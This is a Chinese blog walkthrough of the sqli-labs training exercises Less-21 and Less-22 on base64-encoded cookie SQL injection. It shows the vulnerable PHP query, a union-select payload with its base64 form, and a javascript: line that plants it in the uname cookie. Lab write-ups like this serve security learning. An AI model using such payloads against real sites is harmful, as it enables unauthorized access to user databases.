sql-lab:Less21-22(后续接着更新)

本文主要是介绍sql-lab:Less21-22(后续接着更新)，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

Less-21

此题为SQL注入中的一种注入方式，为cookie注入，具体详解见如下链接
链接：https://blog.csdn.net/LSYZWF/article/details/117072765

此题原理和Less-21一致，只是在构造拼接字段有所差异

题目提示为双引号的base64编码cookie注入
可以猜测后面的字段应该是用双引号括起来的
查看源码SQL语句：

$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

注意第二行，在对cookie进行base64解码后的结果两边加上双引号

查询数据库
编码前:1" union select 1,database(),3#
base64编码后:MSIgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzIw==

设置cookie
可以在地址栏直接设置：
javascript:alert(document.cookie=‘uname=’+escape(‘MSIgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSwzIw==’))

重新打开网址，得到结果
在这里插入图片描述
查表和查字段也是一样，对需要拼接的语句base64编码后设置cookie即可。

这篇关于sql-lab:Less21-22(后续接着更新)的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！